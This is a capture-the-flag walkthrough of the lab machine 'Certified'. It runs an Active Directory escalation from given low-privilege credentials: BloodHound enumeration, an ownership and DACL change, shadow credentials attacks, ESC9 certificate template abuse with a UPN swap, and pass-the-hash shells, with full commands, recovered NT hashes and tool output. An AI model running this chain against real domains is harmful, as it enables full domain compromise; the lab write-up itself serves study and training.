Certified
Last updated
Last updated
Certified is a medium windows machine created by . The user judith.mader has a WriteOwner permission over management group. The owner of management group is given to judith.mader and the management group has a GenericWrite permission over management_svc user which leads to shadow credentials attack. The management_svc has a GenericAll permission over ca_operator user which we can abuse to perform shadow credentials attack. The ca_operator user is member of Certificate Service DCOM Access. The CertifiedAuthentication certificate template is vulnerable to ESC9 attack which is abused to gain the administrator NT hash.
Linux
Medium
30
02-11-2024
15-03-2025
The credentials are given for the following account judith.mader / judith09
Starting the nmap scan and found Active Directory services running.
nmap -Pn -sC -sV --min-rate=1000 10.10.11.41 01:46:41 [53/64]
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-12 01:44 GMT
Nmap scan report for 10.10.11.41
Host is up (0.54s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-12 08:26:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-03-12T08:28:32+00:00; +6h41m56s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-03-12T08:28:34+00:00; +6h41m56s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-12T08:28:32+00:00; +6h41m56s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-12T08:28:32+00:00; +6h41m57s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-03-12T08:27:52
|_ start_date: N/A
|_clock-skew: mean: 6h41m56s, deviation: 0s, median: 6h41m55s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.63 seconds Add certified.htb0 and DC01.certified.htb in /etc/hosts file.
The given credentials will give us access to SMB shares and we don't have any read permission in any of the shares.
nxc smb 10.10.11.41 -u 'judith.mader' -p 'judith09'
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
SMB 10.10.11.41 445 DC01 [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.nxc smb 10.10.11.41 -u 'judith.mader' -p 'judith09' --shares
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
SMB 10.10.11.41 445 DC01 [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB 10.10.11.41 445 DC01 [*] Enumerated shares
SMB 10.10.11.41 445 DC01 Share Permissions Remark
SMB 10.10.11.41 445 DC01 ----- ----------- ------
SMB 10.10.11.41 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.41 445 DC01 C$ Default share
SMB 10.10.11.41 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.41 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.41 445 DC01 SYSVOL READ Logon server share
The given credentials is also used in LDAP. We can use nxc as bloodhound ingestor.
sudo neo4j start
[sudo] password for dexter:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:5167). It is available at http://localhost:7474
There may be a short delay until the server is ready.nxc as a bloodhound ingesternxc ldap 10.10.11.41 -u 'judith.mader' -p 'judith09' --bloodhound --collection all --dns-server 10.10.11.41
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.41 389 DC01 [+] certified.htb\judith.mader:judith09
LDAP 10.10.11.41 389 DC01 [-] Account not found in the BloodHound database.
LDAP 10.10.11.41 389 DC01 Resolved collection methods: psremote, container, localadmin, session, dcom, rdp, acl, group, objectprops, trusts
LDAP 10.10.11.41 389 DC01 Done in 01M 24S
LDAP 10.10.11.41 389 DC01 Compressing output into /home/dexter/.nxc/logs/DC01_10.10.11.41_2025-03-12_062741_bloodhound.zipImport the zip file into the bloodhound.
WriteOwner: The user judith.mader has a WriteOwner permission over the management group with which we can use to set the owner of management group.
GenericWrite: The management group has a GenericWrite permission over the management_svc user with which we can modify the properties of management_svc user and perform shadow credentials attack to the NT hash.
Now the owner of management group is judith.mader, we can give the WriteMembers permission to judith.mader.
impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target 'management' 'certified.htb'/'judith.mader':'judith09'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250312-095736.bak
[*] DACL modified successfully!Now we can add new certificate for shadow credentials attack and retrieve NT hash of that object. More details about it, is given in the link below.
pywhisker -d certified.htb -u 'judith.mader' -p 'judith09' --target 'management_svc' --action add
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: a6bb0dbe-fdb4-3b10-bbd1-b21019d1812c
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: kr6ENKIe.pfx
[+] PFX exportiert nach: kr6ENKIe.pfx
[i] Passwort für PFX: CEuTw5XMnMn5lzMBmnx6
[+] Saved PFX (#PKCS12) certificate & key at path: kr6ENKIe.pfx
[*] Must be used with password: CEuTw5XMnMn5lzMBmnx6
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtoolscertipy auth -pfx management_svc.pfx -u management_svc -domain certified.htb -dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Got hash for 'management_svc@certified.htb': aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584Note: If Clock skew too great error occur use ntpdate to synchronize date and time with the machine.
sudo ntpdate 10.10.11.41
2025-03-12 17:30:26.803193 (+0000) +25198.918123 +/- 0.196661 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25198.918123Now we will get the shell as management_svc using the above NT hash via evil-winrm.
evil-winrm -i 10.10.11.41 -u 'management_svc' -H a091c1832bcdd4677c28b5a6a1295584
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents> Bloodhound reveals that the management_svc user has a GenericAll permission towards the ca_operator user, which give us the full control over ca_operator.
The Shadow Credentials Attack can be performed because of GenericAll permission to retrive the NT hash.
certipy shadow auto -u 'management_svc@certified.htb' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -account ca_operator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '6e487d2d-ee15-8946-8278-792278aac63d'
[*] Adding Key Credential with device ID '6e487d2d-ee15-8946-8278-792278aac63d' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '6e487d2d-ee15-8946-8278-792278aac63d' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': 9a469a712a9d77dd66d1706b81653aeenxc smb 10.10.11.41 -u 'ca_operator' -H 9a469a712a9d77dd66d1706b81653aee
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\ca_operator:9a469a712a9d77dd66d1706b81653aee Bloodhound reveals that the ca_operator is the MemberOf Certificate Service DCOM Access. It is used to manage the certificates in Active Directory.
certipy find -u 'ca_operator' -hashes 9a469a712a9d77dd66d1706b81653aee -dc-ip 10.10.11.41 -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'certified-DC01-CA'
[*] Saved BloodHound data to '20250313021309_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250313021309_Certipy.txt'
[*] Saved JSON output to '20250313021309_Certipy.json'{
"Certificate Authorities": {
"0": {
"CA Name": "certified-DC01-CA",
"DNS Name": "DC01.certified.htb",
"Certificate Subject": "CN=certified-DC01-CA, DC=certified, DC=htb",
"Certificate Serial Number": "36472F2C180FBB9B4983AD4D60CD5A9D",
"Certificate Validity Start": "2024-05-13 15:33:41+00:00",
"Certificate Validity End": "2124-05-13 15:43:41+00:00",
"Web Enrollment": "Disabled",
"User Specified SAN": "Disabled",
"Request Disposition": "Issue",
"Enforce Encryption for Requests": "Enabled",
"Permissions": {
"Owner": "CERTIFIED.HTB\\Administrators",
"Access Rights": {
"2": [
"CERTIFIED.HTB\\Administrators",
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins"
],
"1": [
"CERTIFIED.HTB\\Administrators",
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins"
],
"512": [
"CERTIFIED.HTB\\Authenticated Users"
]
}
}
}
},
"Certificate Templates": {
"0": {
"Template Name": "CertifiedAuthentication",
"Display Name": "Certified Authentication",
"Certificate Authorities": [
"certified-DC01-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDirectoryPath",
"SubjectAltRequireUpn"
],
"Enrollment Flag": [
"NoSecurityExtension",
"AutoEnrollment",
"PublishToDs"
],
"Private Key Flag": [
"16842752"
],
"Extended Key Usage": [
"Server Authentication",
"Client Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1000 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CERTIFIED.HTB\\operator ca",
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CERTIFIED.HTB\\Administrator",
"Write Owner Principals": [
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins",
"CERTIFIED.HTB\\Administrator"
],
"Write Dacl Principals": [
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins",
"CERTIFIED.HTB\\Administrator"
],
"Write Property Principals": [
"CERTIFIED.HTB\\Domain Admins",
"CERTIFIED.HTB\\Enterprise Admins",
"CERTIFIED.HTB\\Administrator"
]
}
},
"[!] Vulnerabilities": {
"ESC9": "'CERTIFIED.HTB\\\\operator ca' can enroll and template has no security extension"
}
}
}
} ESC9 is a vulnerability in Active Directory Certificate Services (AD CS) where the StrongCertificateBindingEnforcement key is not set to 2 or includes the UPN flag. The details about ESC9 is given in hacktricks. The link is given below.
The userPrincipalName has to be changed from ca_operator to administrator.
certipy account update -u "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'CERTIFIED.HTB' at '1.1.1.2'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.10.11.41
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.41:636 - ssl
[+] Default path: DC=certified,DC=htb
[+] Configuration path: CN=Configuration,DC=certified,DC=htb
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'Requesting the CertifiedAuthentication certificate.
certipy req -u 'ca_operator' -hashes 9a469a712a9d77dd66d1706b81653aee -target 'DC01.certified.htb' -ca 'certified-DC01-CA' -ns 10.10.11.41 -dc-ip 10.10.11.41 -template CertifiedAuthentication -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'DC01.certified.htb' at '10.10.11.41'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'Change the UPN from Administrator to ca_operator.
certipy account update -u "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'CERTIFIED.HTB' at '1.1.1.2'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.10.11.41
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.41:636 - ssl
[+] Default path: DC=certified,DC=htb
[+] Configuration path: CN=Configuration,DC=certified,DC=htb
[*] Updating user 'ca_operator':
userPrincipalName : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'certipy auth -pfx administrator.pfx -domain 'certified.htb'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34evil-winrm -i 10.10.11.41 -u 'Administrator' -H 0d5b49608bbce1751f708748f67e2d34
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> The below video provides the PoC of Certified machine.
The use flag is present in C:\Users\\management_svc\Desktop\user.txt
The is used for enumerating and finding vulnerable certificate templates.
The root flag is present in C:\Users\Administrator\Desktop\root.txt
